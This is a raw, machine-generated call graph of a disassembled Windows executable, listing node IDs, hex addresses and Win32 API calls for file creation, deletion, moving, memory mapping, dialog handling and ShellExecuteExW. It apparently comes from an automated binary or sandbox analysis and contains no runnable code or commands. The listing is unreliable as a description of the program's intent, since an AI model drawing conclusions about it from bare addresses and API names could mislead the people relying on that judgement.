23552->23546 23553->23511 23554->23521 23556 d59e64 SetFilePointer 23555->23556 23557 d59e53 23555->23557 23558 d59e9d 23556->23558 23559 d59e82 GetLastError 23556->23559 23557->23558 23600 d56fa5 75 API calls 23557->23600 23558->23521 23559->23558 23561 d59e8c 23559->23561 23561->23558 23601 d56fa5 75 API calls 23561->23601 23564 d59677 23563->23564 23565 d59688 23563->23565 23564->23565 23566 d59683 23564->23566 23567 d5968a 23564->23567 23565->23387 23602 d59817 23566->23602 23607 d596d0 23567->23607 23572 d59bfc 23570->23572 23575 d59c03 23570->23575 23572->23521 23573 d59c9e 23573->23572 23634 d56f6b 75 API calls 23573->23634 23575->23572 23575->23573 23576 d59cc0 23575->23576 23622 d5984e 23575->23622 23576->23572 23577 d5984e 5 API calls 23576->23577 23577->23576 23578->23521 23579->23518 23580->23537 23581->23534 23582->23533 23583->23524 23584->23537 23585->23537 23586->23529 23588 d5b679 23587->23588 23596 d5b683 23588->23596 23597 d5b806 CharUpperW 23588->23597 23590 d5b692 23598 d5b832 CharUpperW 23590->23598 23592 d5b6a1 23593 d5b6a5 23592->23593 23594 d5b71c GetCurrentDirectoryW 23592->23594 23599 d5b806 CharUpperW 23593->23599 23594->23596 23596->23549 23597->23590 23598->23592 23599->23596 23600->23556 23601->23558 23603 d59824 23602->23603 23604 d59820 23602->23604 23603->23604 23613 d5a12d 23603->23613 23604->23565 23608 d596dc 23607->23608 23609 d596fa 23607->23609 23608->23609 23611 d596e8 FindCloseChangeNotification 23608->23611 23610 d59719 23609->23610 23621 d56e3e 74 API calls 23609->23621 23610->23565 23611->23609 23614 d6e360 23613->23614 23615 d5a13a DeleteFileW 23614->23615 23616 d5984c 23615->23616 23617 d5a14d 23615->23617 23616->23565 23618 d5b66c 2 API calls 23617->23618 23619 d5a161 23618->23619 23619->23616 23620 d5a165 DeleteFileW 23619->23620 23620->23616 23621->23610 23623 d59867 ReadFile 23622->23623 23624 d5985c GetStdHandle 23622->23624 23625 d59880 23623->23625 23626 d598a0 23623->23626 23624->23623 23635 d59989 23625->23635 23626->23575 23628 d59887 23629 d59895 23628->23629 23630 d598b7 23628->23630 23631 d598a8 GetLastError 23628->23631 23633 d5984e GetFileType 23629->23633 23630->23626 23632 d598c7 GetLastError 23630->23632 23631->23626 23631->23630 23632->23626 23632->23629 23633->23626 23634->23572 23636 d59992 GetFileType 23635->23636 23637 d5998f 23635->23637 23638 d599a0 23636->23638 23637->23628 23638->23628 23640 d6e24f ___std_exception_copy 23639->23640 23641 d68854 23640->23641 23645 d771ad 7 API calls 2 library calls 23640->23645 23646 d6ecce RaiseException Concurrency::cancel_current_task new 23640->23646 23647 d6ecb1 RaiseException Concurrency::cancel_current_task 23640->23647 23641->22953 23645->23640 23649 d77430 _unexpected 23648->23649 23650 d77448 23649->23650 23652 d7757e _abort GetModuleHandleW 23649->23652 23670 d7a3f1 EnterCriticalSection 23650->23670 23653 d7743c 23652->23653 23653->23650 23682 d775c2 GetModuleHandleExW 23653->23682 23654 d774ee 23671 d7752e 23654->23671 23657 d77450 23657->23654 23659 d774c5 23657->23659 23690 d77f30 20 API calls _abort 23657->23690 23662 d774dd 23659->23662 23663 d781f1 _abort 5 API calls 23659->23663 23660 d77537 23691 d81a19 5 API calls DloadUnlock 23660->23691 23661 d7750b 23674 d7753d 23661->23674 23664 d781f1 _abort 5 API calls 23662->23664 23663->23662 23664->23654 23670->23657 23692 d7a441 LeaveCriticalSection 23671->23692 23673 d77507 23673->23660 23673->23661 23693 d7a836 23674->23693 23677 d7756b 23680 d775c2 _abort 8 API calls 23677->23680 23678 d7754b GetPEB 23678->23677 23679 d7755b GetCurrentProcess TerminateProcess 23678->23679 23679->23677 23681 d77573 ExitProcess 23680->23681 23683 d7760f 23682->23683 23684 d775ec GetProcAddress 23682->23684 23685 d77615 FreeLibrary 23683->23685 23686 d7761e 23683->23686 23687 d77601 23684->23687 23685->23686 23688 d6ec4a DloadUnlock 5 API calls 23686->23688 23687->23683 23689 d77628 23688->23689 23689->23650 23690->23659 23692->23673 23694 d7a851 23693->23694 23695 d7a85b 23693->23695 23697 d6ec4a DloadUnlock 5 API calls 23694->23697 23696 d7a458 __dosmaperr 5 API calls 23695->23696 23696->23694 23698 d77547 23697->23698 23698->23677 23698->23678 24774 d6acd0 100 API calls 24828 d619d0 26 API calls std::bad_exception::bad_exception 24775 d6a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24777 d6eac0 27 API calls pre_c_initialization 24832 d7ebc1 21 API calls __vswprintf_c_l 24833 d697c0 10 API calls 24779 d79ec0 21 API calls 24834 d7b5c0 GetCommandLineA GetCommandLineW 24837 d6ebf7 20 API calls 24839 d7abfd 6 API calls DloadUnlock 23809 d6e1f9 23810 d6e203 23809->23810 23811 d6df59 ___delayLoadHelper2@8 19 API calls 23810->23811 23812 d6e210 23811->23812 24782 d714f8 RaiseException 23815 d6aee0 23816 d6aeea __EH_prolog 23815->23816 23978 d5130b 23816->23978 23819 d6af2c 23823 d6afa2 23819->23823 23824 d6af39 23819->23824 23880 d6af18 23819->23880 23820 d6b5cb 24043 d6cd2e 23820->24043 23827 d6b041 GetDlgItemTextW 23823->23827 23833 d6afbc 23823->23833 23828 d6af3e 23824->23828 23830 d6af75 23824->23830 23825 d6b5f7 23831 d6b600 SendDlgItemMessageW 23825->23831 23832 d6b611 GetDlgItem SendMessageW 23825->23832 23826 d6b5e9 SendMessageW 23826->23825 23829 d6b077 23827->23829 23827->23830 23834 d5ddd1 53 API calls 23828->23834 23828->23880 23836 d6b08f GetDlgItem 23829->23836 23976 d6b080 23829->23976 23835 d6af96 KiUserCallbackDispatcher 23830->23835 23830->23880 23831->23832 24061 d69da4 GetCurrentDirectoryW 23832->24061 23838 d5ddd1 53 API calls 23833->23838 23839 d6af58 23834->23839 23835->23880 23841 d6b0a4 SendMessageW SendMessageW 23836->23841 23842 d6b0c5 SetFocus 23836->23842 23843 d6afde SetDlgItemTextW 23838->23843 24083 d51241 SHGetMalloc 23839->24083 23840 d6b641 GetDlgItem 23846 d6b664 SetWindowTextW 23840->23846 23847 d6b65e 23840->23847 23841->23842 23848 d6b0d5 23842->23848 23861 d6b0ed 23842->23861 23844 d6afec 23843->23844 23855 d6aff9 GetMessageW 23844->23855 23844->23880 24062 d6a2c7 GetClassNameW 23846->24062 23847->23846 23849 d5ddd1 53 API calls 23848->23849 23854 d6b0df 23849->23854 23850 d6af5f 23856 d6af63 SetDlgItemTextW 23850->23856 23850->23880 23851 d6b56b 23857 d5ddd1 53 API calls 23851->23857 24084 d6cb5a 23854->24084 23860 d6b010 IsDialogMessageW 23855->23860 23855->23880 23856->23880 23862 d6b57b SetDlgItemTextW 23857->23862 23860->23844 23864 d6b01f TranslateMessage DispatchMessageW 23860->23864 23866 d5ddd1 53 API calls 23861->23866 23865 d6b58f 23862->23865 23864->23844 23869 d5ddd1 53 API calls 23865->23869 23868 d6b124 23866->23868 23867 d6b6af 23873 d6b6df 23867->23873 23878 d5ddd1 53 API calls 23867->23878 23874 d5400a _swprintf 51 API calls 23868->23874 23875 d6b5b8 23869->23875 23870 d6b0e6 23988 d5a04f 23870->23988 23872 d6bdf5 98 API calls 23872->23867 23886 d6bdf5 98 API calls 23873->23886 23916 d6b797 23873->23916 23879 d6b136 23874->23879 23876 d5ddd1 53 API calls 23875->23876 23876->23880 23884 d6b6c2 SetDlgItemTextW 23878->23884 23885 d6cb5a 16 API calls 23879->23885 23881 d6b847 23888 d6b850 EnableWindow 23881->23888 23889 d6b859 23881->23889 23882 d6b174 GetLastError 23883 d6b17f 23882->23883 23994 d6a322 SetCurrentDirectoryW 23883->23994 23891 d5ddd1 53 API calls 23884->23891 23885->23870 23887 d6b6fa 23886->23887 23895 d6b70c 23887->23895 23917 d6b731 23887->23917 23888->23889 23892 d6b876 23889->23892 24102 d512c8 GetDlgItem EnableWindow 23889->24102 23894 d6b6d6 SetDlgItemTextW 23891->23894 23900 d6b89d 23892->23900 23908 d6b895 SendMessageW 23892->23908 23893 d6b195 23898 d6b1ac 23893->23898 23899 d6b19e GetLastError 23893->23899 23894->23873 24100 d69635 32 API calls 23895->24100 23896 d6b78a 23901 d6bdf5 98 API calls 23896->23901 23907 d6b227 23898->23907 23911 d6b237 23898->23911 23913 d6b1c4 GetTickCount 23898->23913 23899->23898 23900->23880 23904 d5ddd1 53 API calls 23900->23904 23901->23916 23903 d6b86c 24103 d512c8 GetDlgItem EnableWindow 23903->24103 23910 d6b8b6 SetDlgItemTextW 23904->23910 23905 d6b725 23905->23917 23907->23911 23912 d6b46c 23907->23912 23908->23900 23909 d6b825 24101 d69635 32 API calls 23909->24101 23910->23880 23919 d6b407 23911->23919 23920 d6b24f GetModuleFileNameW 23911->23920 24003 d512e6 GetDlgItem ShowWindow 23912->24003 23914 d5400a _swprintf 51 API calls 23913->23914 23921 d6b1dd 23914->23921 23916->23881 23916->23909 23923 d5ddd1 53 API calls 23916->23923 23917->23896 23924 d6bdf5 98 API calls 23917->23924 23919->23830 23928 d5ddd1 53 API calls 23919->23928 24094 d5eb3a 80 API calls 23920->24094 23995 d5971e 23921->23995 23922 d6b844 23922->23881 23923->23916 23929 d6b75f 23924->23929 23925 d6b47c 24004 d512e6 GetDlgItem ShowWindow 23925->24004 23927 d6b275 23932 d5400a _swprintf 51 API calls 23927->23932 23933 d6b41b 23928->23933 23929->23896 23934 d6b768 DialogBoxParamW 23929->23934 23931 d6b486 23935 d5ddd1 53 API calls 23931->23935 23936 d6b297 CreateFileMappingW 23932->23936 23938 d5400a _swprintf 51 API calls 23933->23938 23934->23830 23934->23896 23939 d6b490 SetDlgItemTextW 23935->23939 23940 d6b376 __vsnwprintf_l 23936->23940 23941 d6b2f9 GetCommandLineW 23936->23941 23943 d6b439 23938->23943 24005 d512e6 GetDlgItem ShowWindow 23939->24005 23944 d6b381 ShellExecuteExW 23940->23944 23946 d6b30a 23941->23946 23942 d6b203 23947 d6b20a GetLastError 23942->23947 23948 d6b215 23942->23948 23955 d5ddd1 53 API calls 23943->23955 23965 d6b39e 23944->23965 24095 d6ab2e SHGetMalloc 23946->24095 23947->23948 23951 d59653 79 API calls 23948->23951 23949 d6b4a2 SetDlgItemTextW GetDlgItem 23952 d6b4d7 23949->23952 23953 d6b4bf GetWindowLongW SetWindowLongW 23949->23953 23951->23907 24006 d6bdf5 23952->24006 23953->23952 23954 d6b326 24096 d6ab2e SHGetMalloc 23954->24096 23955->23830 23959 d6b332 24097 d6ab2e SHGetMalloc 23959->24097 23960 d6bdf5 98 API calls 23962 d6b4f3 23960->23962 24031 d6d0f5 23962->24031 23963 d6b33e 24098 d5ecad 80 API calls ___scrt_get_show_window_mode 23963->24098 23964 d6b3e1 23964->23919 23968 d6b3f7 UnmapViewOfFile CloseHandle 23964->23968 23965->23964 23971 d6b3cd Sleep 23965->23971 23968->23919 23970 d6b355 MapViewOfFile 23970->23940 23971->23964 23971->23965 23972 d6bdf5 98 API calls 23975 d6b519 23972->23975 23973 d6b542 24099 d512c8 GetDlgItem EnableWindow 23973->24099 23975->23973 23977 d6bdf5 98 API calls 23975->23977 23976->23830 23976->23851 23977->23973 23979 d51314 23978->23979 23980 d5136d 23978->23980 23982 d5137a 23979->23982 24104 d5da98 62 API calls 2 library calls 23979->24104 24105 d5da71 GetWindowLongW SetWindowLongW 23980->24105 23982->23819 23982->23820 23982->23880 23984 d51336 23984->23982 23985 d51349 GetDlgItem 23984->23985 23985->23982 23986 d51359 23985->23986 23986->23982 23987 d5135f SetWindowTextW 23986->23987 23987->23982 23991 d5a059 23988->23991 23989 d5a0ea 23990 d5a207 9 API calls 23989->23990 23992 d5a113 23989->23992 23990->23992 23991->23989 23991->23992 24106 d5a207 23991->24106 23992->23882 23992->23883 23994->23893 23996 d59728 23995->23996 23997 d59792 CreateFileW 23996->23997 23998 d59786 23996->23998 23997->23998 23999 d597e4 23998->23999 24000 d5b66c 2 API calls 23998->24000 23999->23942 24001 d597cb 24000->24001 24001->23999 24002 d597cf CreateFileW 24001->24002 24002->23999 24003->23925 24004->23931 24005->23949 24007 d6bdff __EH_prolog 24006->24007 24008 d6b4e5 24007->24008 24138 d6aa36 24007->24138 24008->23960 24011 d6aa36 ExpandEnvironmentStringsW 24020 d6be36 _wcsrchr 24011->24020 24012 d6c11d SetWindowTextW 24012->24020 24017 d6bf0b SetFileAttributesW 24019 d6bfc5 GetFileAttributesW 24017->24019 24030 d6bf25 ___scrt_get_show_window_mode 24017->24030 24019->24020 24022 d6bfd7 DeleteFileW 24019->24022 24020->24008 24020->24011 24020->24012 24020->24017 24023 d6c2e7 GetDlgItem SetWindowTextW SendMessageW 24020->24023 24027 d6c327 SendMessageW 24020->24027 24142 d617ac CompareStringW 24020->24142 24143 d69da4 GetCurrentDirectoryW 24020->24143 24145 d5a52a 7 API calls 24020->24145 24146 d5a4b3 FindClose 24020->24146 24147 d6ab9a 76 API calls ___std_exception_copy 24020->24147 24148 d735de 24020->24148 24022->24020 24024 d6bfe8 24022->24024 24023->24020 24025 d5400a _swprintf 51 API calls 24024->24025 24026 d6c008 GetFileAttributesW 24025->24026 24026->24024 24028 d6c01d MoveFileW 24026->24028 24027->24020 24028->24020 24029 d6c035 MoveFileExW 24028->24029 24029->24020 24030->24019 24030->24020 24144 d5b4f7 52 API calls 2 library calls 24030->24144 24032 d6d0ff __EH_prolog 24031->24032 24163 d5fead 24032->24163 24034 d6d130 24167 d55c59 24034->24167 24036 d6d14e 24171 d57c68 24036->24171 24040 d6d1a1 24188 d57cfb 24040->24188 24042 d6b504 24042->23972 24044 d6cd38 24043->24044 24045 d69d1a 4 API calls 24044->24045 24046 d6cd3d 24045->24046 24047 d6b5d1 24046->24047 24048 d6cd45 GetWindow 24046->24048 24047->23825 24047->23826 24048->24047 24049 d6cd65 24048->24049 24049->24047 24050 d6cd72 GetClassNameW 24049->24050 24052 d6cd96 GetWindowLongW 24049->24052 24053 d6cdfa GetWindow 24049->24053 24632 d617ac CompareStringW 24050->24632 24052->24053 24054 d6cda6 SendMessageW 24052->24054 24053->24047 24053->24049 24054->24053 24055 d6cdbc GetObjectW 24054->24055 24633 d69d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24055->24633 24057 d6cdd3 24634 d69d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24057->24634 24635 d69f5d 8 API calls ___scrt_get_show_window_mode 24057->24635 24060 d6cde4 SendMessageW DeleteObject 24060->24053 24061->23840 24063 d6a2e8 24062->24063 24069 d6a30d 24062->24069 24636 d617ac CompareStringW 24063->24636 24064 d6a312 SHAutoComplete 24065 d6a31b 24064->24065 24070 d6a7c3 24065->24070 24067 d6a2fb 24068 d6a2ff FindWindowExW 24067->24068 24067->24069 24068->24069 24069->24064 24069->24065 24071 d6a7cd __EH_prolog 24070->24071 24072 d51380 82 API calls 24071->24072 24073 d6a7ef 24072->24073 24637 d51f4f 24073->24637 24076 d6a818 24079 d51951 126 API calls 24076->24079 24077 d6a809 24078 d51631 84 API calls 24077->24078 24080 d6a814 24078->24080 24081 d6a83a __vsnwprintf_l ___std_exception_copy 24079->24081 24080->23867 24080->23872 24081->24080 24082 d51631 84 API calls 24081->24082 24082->24080 24083->23850 24085 d6ac74 5 API calls 24084->24085 24086 d6cb66 GetDlgItem 24085->24086 24087 d6cbbc SendMessageW SendMessageW 24086->24087 24088 d6cb88 24086->24088 24089 d6cc17 SendMessageW SendMessageW SendMessageW 24087->24089 24090 d6cbf8 24087->24090 24091 d6cb93 ShowWindow SendMessageW SendMessageW 24088->24091 24092 d6cc6d SendMessageW 24089->24092 24093 d6cc4a SendMessageW 24089->24093 24090->24089 24091->24087 24092->23870 24093->24092 24094->23927 24095->23954 24096->23959 24097->23963 24098->23970 24099->23976 24100->23905 24101->23922 24102->23903 24103->23892 24104->23984 24105->23982 24107 d5a214 24106->24107 24108 d5a238 24107->24108 24110 d5a22b CreateDirectoryW 24107->24110 24127 d5a180 24108->24127 24110->24108 24111 d5a26b 24110->24111 24116 d5a27a 24111->24116 24119 d5a444 24111->24119 24113 d5a27e GetLastError 24113->24116 24114 d5b66c 2 API calls 24117 d5a254 24114->24117 24116->23991 24117->24113 24118 d5a258 CreateDirectoryW 24117->24118 24118->24111 24118->24113 24120 d6e360 24119->24120 24121 d5a451 SetFileAttributesW 24120->24121 24122 d5a494 24121->24122 24123 d5a467 24121->24123 24122->24116 24124 d5b66c 2 API calls 24123->24124 24125 d5a47b 24124->24125 24125->24122 24126 d5a47f SetFileAttributesW 24125->24126 24126->24122 24130 d5a194 24127->24130 24131 d6e360 24130->24131 24132 d5a1a1 GetFileAttributesW 24131->24132 24133 d5a1b2 24132->24133 24134 d5a189 24132->24134 24135 d5b66c 2 API calls 24133->24135 24134->24113 24134->24114 24136 d5a1c6 24135->24136 24136->24134 24137 d5a1ca GetFileAttributesW 24136->24137 24137->24134 24139 d6aa40 24138->24139 24140 d6aaf3 ExpandEnvironmentStringsW 24139->24140 24141 d6ab16 24139->24141 24140->24141 24141->24020 24142->24020 24143->24020 24144->24030 24145->24020 24146->24020 24147->24020 24149 d78606 24148->24149 24150 d78613 24149->24150 24151 d7861e 24149->24151 24153 d78518 __vswprintf_c_l 21 API calls 24150->24153 24152 d78626 24151->24152 24160 d7862f _unexpected 24151->24160 24154 d784de _free 20 API calls 24152->24154 24157 d7861b 24153->24157 24154->24157 24155 d78634 24161 d7895a 20 API calls __dosmaperr 24155->24161 24156 d78659 HeapReAlloc 24156->24157 24156->24160 24157->24020 24160->24155 24160->24156 24162 d771ad 7 API calls 2 library calls 24160->24162 24161->24157 24162->24160 24164 d5feba 24163->24164 24192 d51789 24164->24192 24166 d5fed2 24166->24034 24168 d5fead 24167->24168 24169 d51789 76 API calls 24168->24169 24170 d5fed2 24169->24170 24170->24036 24172 d57c72 __EH_prolog 24171->24172 24209 d5c827 24172->24209 24174 d57c8d 24175 d6e24a new 8 API calls 24174->24175 24176 d57cb7 24175->24176 24215 d6440b 24176->24215 24179 d57ddf 24180 d57de9 24179->24180 24181 d57e53 24180->24181 24244 d5a4c6 24180->24244 24183 d57ec4 24181->24183 24187 d5a4c6 8 API calls 24181->24187 24222 d5837f 24181->24222 24184 d57f06 24183->24184 24250 d56dc1 74 API calls 24183->24250 24184->24040 24187->24181 24189 d57d09 24188->24189 24191 d57d10 24188->24191 24190 d61acf 84 API calls 24189->24190 24190->24191 24193 d5179f 24192->24193 24204 d517fa __vsnwprintf_l 24192->24204 24194 d517c8 24193->24194 24205 d56e91 74 API calls __vswprintf_c_l 24193->24205 24195 d51827 24194->24195 24201 d517e7 ___std_exception_copy 24194->24201 24197 d735de 22 API calls 24195->24197 24199 d5182e 24197->24199 24198 d517be 24206 d56efd 75 API calls 24198->24206 24199->24204 24208 d56efd 75 API calls 24199->24208 24201->24204 24207 d56efd 75 API calls 24201->24207 24204->24166 24205->24198 24206->24194 24207->24204 24208->24204 24210 d5c831 __EH_prolog 24209->24210 24211 d6e24a new 8 API calls 24210->24211 24212 d5c874 24211->24212 24213 d6e24a new 8 API calls 24212->24213 24214 d5c898 24213->24214 24214->24174 24216 d64415 __EH_prolog 24215->24216 24217 d6e24a new 8 API calls 24216->24217 24218 d64431 24217->24218 24219 d57ce6 24218->24219 24221 d606ba 78 API calls 24218->24221 24219->24179 24221->24219 24223 d58389 __EH_prolog 24222->24223 24251 d51380 24223->24251 24225 d583a4 24259 d59ef7 24225->24259 24231 d583d3 24382 d51631 24231->24382 24232 d5846e 24278 d58517 24232->24278 24236 d584ce 24285 d51f00 24236->24285 24239 d583cf 24239->24231 24239->24232 24242 d5a4c6 8 API calls 24239->24242 24386 d5bac4 CompareStringW 24239->24386 24240 d584d9 24240->24231 24289 d53aac 24240->24289 24299 d5857b 24240->24299 24242->24239 24245 d5a4db 24244->24245 24246 d5a4df 24245->24246 24620 d5a5f4 24245->24620 24246->24180 24248 d5a4ef 24248->24246 24249 d5a4f4 FindClose 24248->24249 24249->24246 24250->24184 24252 d51385 __EH_prolog 24251->24252 24253 d5c827 8 API calls 24252->24253 24254 d513bd 24253->24254 24255 d6e24a new 8 API calls 24254->24255 24258 d51416 ___scrt_get_show_window_mode 24254->24258 24256 d51403 24255->24256 24257 d5b07d 82 API calls 24256->24257 24256->24258 24257->24258 24258->24225 24260 d59f0e 24259->24260 24261 d583ba 24260->24261 24387 d56f5d 76 API calls 24260->24387 24261->24231 24263 d519a6 24261->24263 24264 d519b0 __EH_prolog 24263->24264 24274 d51a00 24264->24274 24277 d519e5 24264->24277 24388 d5709d 24264->24388 24266 d51b60 24269 d53aac 97 API calls 24266->24269 24266->24277 24267 d51b50 24391 d56dc1 74 API calls 24267->24391 24271 d51bb3 24269->24271 24270 d51bff 24276 d51c32 24270->24276 24270->24277 24392 d56dc1 74 API calls 24270->24392 24271->24270 24273 d53aac 97 API calls 24271->24273 24273->24271 24274->24266 24274->24267 24274->24277 24275 d53aac 97 API calls 24275->24276 24276->24275 24276->24277 24277->24239 24279 d58524 24278->24279 24410 d60c26 GetSystemTime SystemTimeToFileTime 24279->24410 24281 d58488 24281->24236 24282 d61359 24281->24282 24412 d6d51a 24282->24412 24287 d51f05 __EH_prolog 24285->24287 24286 d51f39 24286->24240 24287->24286 24420 d51951 24287->24420 24290 d53abc 24289->24290 24291 d53ab8 24289->24291 24292 d53af7 24290->24292 24293 d53ae9 24290->24293 24291->24240 24555 d527e8 97 API calls 3 library calls 24292->24555 24294 d53b29 24293->24294 24554 d53281 85 API calls 3 library calls 24293->24554 24294->24240 24297 d53af5 24297->24294 24556 d5204e 74 API calls 24297->24556 24300 d58585 __EH_prolog 24299->24300 24301 d585be 24300->24301 24309 d585c2 24300->24309 24579 d684bd 99 API calls 24300->24579 24302 d585e7 24301->24302 24307 d5867a 24301->24307 24301->24309 24303 d58609 24302->24303 24302->24309 24580 d57b66 151 API calls 24302->24580 24303->24309 24581 d684bd 99 API calls 24303->24581 24307->24309 24557 d55e3a 24307->24557 24309->24240 24310 d58705 24310->24309 24563 d5826a 24310->24563 24313 d58875 24314 d5a4c6 8 API calls 24313->24314 24315 d588e0 24313->24315 24314->24315 24567 d57d6c 24315->24567 24317 d5c991 80 API calls 24320 d5893b _memcmp 24317->24320 24318 d58a70 24319 d58b43 24318->24319 24326 d58abf 24318->24326 24324 d58b9e 24319->24324 24334 d58b4e 24319->24334 24320->24309 24320->24317 24320->24318 24321 d58a69 24320->24321 24582 d58236 82 API calls 24320->24582 24583 d51f94 74 API calls 24320->24583 24584 d51f94 74 API calls 24321->24584 24333 d58b30 24324->24333 24587 d580ea 96 API calls 24324->24587 24325 d58b9c 24327 d59653 79 API calls 24325->24327 24328 d5a180 4 API calls 24326->24328 24326->24333 24327->24309 24331 d58af7 24328->24331 24330 d59653 79 API calls 24330->24309 24331->24333 24585 d59377 96 API calls 24331->24585 24332 d58c09 24336 d59989 GetFileType 24332->24336 24345 d58c74 24332->24345 24373 d591c1 ___InternalCxxFrameHandler 24332->24373 24333->24325 24333->24332 24334->24325 24586 d57f26 100 API calls ___InternalCxxFrameHandler 24334->24586 24335 d5aa88 8 API calls 24338 d58cc3 24335->24338 24340 d58c4c 24336->24340 24341 d5aa88 8 API calls 24338->24341 24340->24345 24588 d51f94 74 API calls 24340->24588 24349 d58cd9 24341->24349 24343 d58c62 24589 d57061 75 API calls 24343->24589 24345->24335 24346 d58d9c 24347 d58df7 24346->24347 24348 d58efd 24346->24348 24350 d58e69 24347->24350 24351 d58e07 24347->24351 24353 d58f23 24348->24353 24354 d58f0f 24348->24354 24361 d58e27 24348->24361 24349->24346 24590 d59b21 SetFilePointer GetLastError SetEndOfFile 24349->24590 24352 d5826a CharUpperW 24350->24352 24356 d58e4d 24351->24356 24364 d58e15 24351->24364 24357 d58e84 24352->24357 24355 d62c42 75 API calls 24353->24355 24358 d592e6 121 API calls 24354->24358 24359 d58f3c 24355->24359 24356->24361 24592 d57907 108 API calls 24356->24592 24357->24361 24366 d58eb4 24357->24366 24367 d58ead 24357->24367 24358->24361 24595 d628f1 121 API calls 24359->24595 24372 d5904b 24361->24372 24596 d51f94 74 API calls 24361->24596 24591 d51f94 74 API calls 24364->24591 24594 d59224 94 API calls __EH_prolog 24366->24594 24593 d57698 84 API calls ___InternalCxxFrameHandler 24367->24593 24371 d59156 24371->24373 24375 d5a444 4 API calls 24371->24375 24372->24371 24372->24373 24374 d59104 24372->24374 24573 d59ebf SetEndOfFile 24372->24573 24373->24330 24574 d59d62 24374->24574 24376 d591b1 24375->24376 24376->24373 24597 d51f94 74 API calls 24376->24597 24379 d5914b 24381 d596d0 75 API calls 24379->24381 24381->24371 24384 d51643 24382->24384 24612 d5c8ca 24384->24612 24386->24239 24387->24261 24393 d516d2 24388->24393 24390 d570b9 24390->24274 24391->24277 24392->24276 24394 d516e8 24393->24394 24405 d51740 __vsnwprintf_l 24393->24405 24395 d51711 24394->24395 24406 d56e91 74 API calls __vswprintf_c_l 24394->24406 24397 d51767 24395->24397 24398 d5172d ___std_exception_copy 24395->24398 24400 d735de 22 API calls 24397->24400 24398->24405 24408 d56efd 75 API calls 24398->24408 24399 d51707 24407 d56efd 75 API calls 24399->24407 24402 d5176e 24400->24402 24402->24405 24409 d56efd 75 API calls 24402->24409 24405->24390 24406->24399 24407->24395 24408->24405 24409->24405 24411 d60c56 __vswprintf_c_l 24410->24411 24411->24281 24413 d6d527 24412->24413 24414 d5ddd1 53 API calls 24413->24414 24415 d6d54a 24414->24415 24416 d5400a _swprintf 51 API calls 24415->24416 24417 d6d55c 24416->24417 24418 d6cb5a 16 API calls 24417->24418 24419 d61372 24418->24419 24419->24236 24421 d51961 24420->24421 24423 d5195d 24420->24423 24424 d51896 24421->24424 24423->24286 24425 d518a8 24424->24425 24426 d518e5 24424->24426 24427 d53aac 97 API calls 24425->24427 24432 d53f18 24426->24432 24430 d518c8 24427->24430 24430->24423 24433 d53f21 24432->24433 24434 d53aac 97 API calls 24433->24434 24436 d51906 24433->24436 24449 d6067c 24433->24449 24434->24433 24436->24430 24437 d51e00 24436->24437 24438 d51e0a __EH_prolog 24437->24438 24457 d53b3d 24438->24457 24440 d51e34 24441 d516d2 76 API calls 24440->24441 24443 d51ebb 24440->24443 24442 d51e4b 24441->24442 24485 d51849 76 API calls 24442->24485 24443->24430 24445 d51e63 24447 d51e6f 24445->24447 24486 d6137a MultiByteToWideChar 24445->24486 24487 d51849 76 API calls 24447->24487 24450 d60683 24449->24450 24451 d6069e 24450->24451 24455 d56e8c RaiseException Concurrency::cancel_current_task 24450->24455 24453 d606af SetThreadExecutionState 24451->24453 24456 d56e8c RaiseException Concurrency::cancel_current_task 24451->24456 24453->24433 24455->24451 24456->24453 24458 d53b47 __EH_prolog 24457->24458 24459 d53b5d 24458->24459 24460 d53b79 24458->24460 24516 d56dc1 74 API calls 24459->24516 24462 d53dc2 24460->24462 24465 d53ba5 24460->24465 24533 d56dc1 74 API calls 24462->24533 24464 d53b68 24464->24440 24465->24464 24488 d62c42 24465->24488 24467 d53c26 24469 d53cb1 24467->24469 24484 d53c1d 24467->24484 24519 d5c991 24467->24519 24468 d53c22 24468->24467 24518 d52034 76 API calls 24468->24518 24501 d5aa88 24469->24501 24471 d53bf4 24471->24467 24471->24468 24472 d53c12 24471->24472 24517 d56dc1 74 API calls 24472->24517 24474 d53cc4 24478 d53d3e 24474->24478 24479 d53d48 24474->24479 24505 d592e6 24478->24505 24525 d628f1 121 API calls 24479->24525 24482 d53d46 24482->24484 24526 d51f94 74 API calls 24482->24526 24527 d61acf 24484->24527 24485->24445 24486->24447 24487->24443 24489 d62c51 24488->24489 24491 d62c5b 24488->24491 24534 d56efd 75 API calls 24489->24534 24492 d62ca2 ___std_exception_copy 24491->24492 24493 d62c9d Concurrency::cancel_current_task 24491->24493 24500 d62cfd ___scrt_get_show_window_mode 24491->24500 24495 d62da9 Concurrency::cancel_current_task 24492->24495 24497 d62cd9 24492->24497 24492->24500 24536 d7157a RaiseException 24493->24536 24537 d7157a RaiseException 24495->24537 24535 d62b7b 75 API calls 3 library calls 24497->24535 24499 d62dc1 24500->24471 24500->24500 24502 d5aa95 24501->24502 24504 d5aa9f 24501->24504 24503 d6e24a new 8 API calls 24502->24503 24503->24504 24504->24474 24506 d592f0 __EH_prolog 24505->24506 24538 d57dc6 24506->24538 24509 d5709d 76 API calls 24510 d59302 24509->24510 24541 d5ca6c 24510->24541 24512 d59314 24513 d5935c 24512->24513 24515 d5ca6c 114 API calls 24512->24515 24550 d5cc51 97 API calls __vsnwprintf_l 24512->24550 24513->24482 24515->24512 24516->24464 24517->24484 24518->24467 24520 d5c9c4 24519->24520 24521 d5c9b2 24519->24521 24552 d56249 80 API calls 24520->24552 24551 d56249 80 API calls 24521->24551 24524 d5c9bc 24524->24469 24525->24482 24526->24484 24528 d61ad9 24527->24528 24529 d61af2 24528->24529 24532 d61b06 24528->24532 24553 d6075b 84 API calls 24529->24553 24531 d61af9 24531->24532 24533->24464 24534->24491 24535->24500 24536->24495 24537->24499 24539 d5acf5 GetVersionExW 24538->24539 24540 d57dcb 24539->24540 24540->24509 24547 d5ca82 __vsnwprintf_l 24541->24547 24542 d5cbf7 24543 d5cc1f 24542->24543 24544 d5ca0b 6 API calls 24542->24544 24545 d6067c SetThreadExecutionState RaiseException 24543->24545 24544->24543 24548 d5cbee 24545->24548 24546 d684bd 99 API calls 24546->24547 24547->24542 24547->24546 24547->24548 24549 d5ab70 89 API calls 24547->24549 24548->24512 24549->24547 24550->24512 24551->24524 24552->24524 24553->24531 24554->24297 24555->24297 24556->24294 24558 d55e4a 24557->24558 24598 d55d67 24558->24598 24561 d55e7d 24562 d55eb5 24561->24562 24603 d5ad65 CharUpperW CompareStringW 